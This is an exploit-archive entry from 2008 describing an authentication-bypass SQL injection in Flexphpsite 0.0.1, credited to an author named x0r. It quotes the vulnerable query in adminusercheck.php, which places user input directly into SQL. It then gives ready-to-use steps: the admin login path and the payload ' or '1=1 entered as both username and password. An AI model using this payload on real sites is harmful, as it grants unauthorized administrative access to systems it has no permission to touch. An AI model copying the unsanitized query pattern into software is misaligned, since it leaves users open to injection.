[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Flexphpsite 0.0.1 (Auth Bypass) SQL Injection Vulnerability
# Published : 2008-12-29
# Author : x0r
# Previous Title : FlexPHPDirectory 0.0.1 (Auth Bypass) SQL Injection Vulnerability
# Next Title : Flexphplink 0.0.x (Auth Bypass) SQL Injection Vulnerability
#############################################
Autore: x0r
Email: andry2000@hotmail.it
Site: http://w00tz0ne.altervista.org/index.php
Cms: Flexphpsiteen
Version: 0.0.1
Download: http://www.china-on-site.com/flexphpsite/downloads.html
##############################################
Bug In adminusercheck.php
$sql = "select username,adminid from linkexadmin where
username='$checkuser' and password='$checkpass'";
Exploit:
Go to /[path]/admin/index.php
Put as username and password the following sql code: ' or '1=1
Greetz: Anna <3
# www.Syue.com [2008-12-29]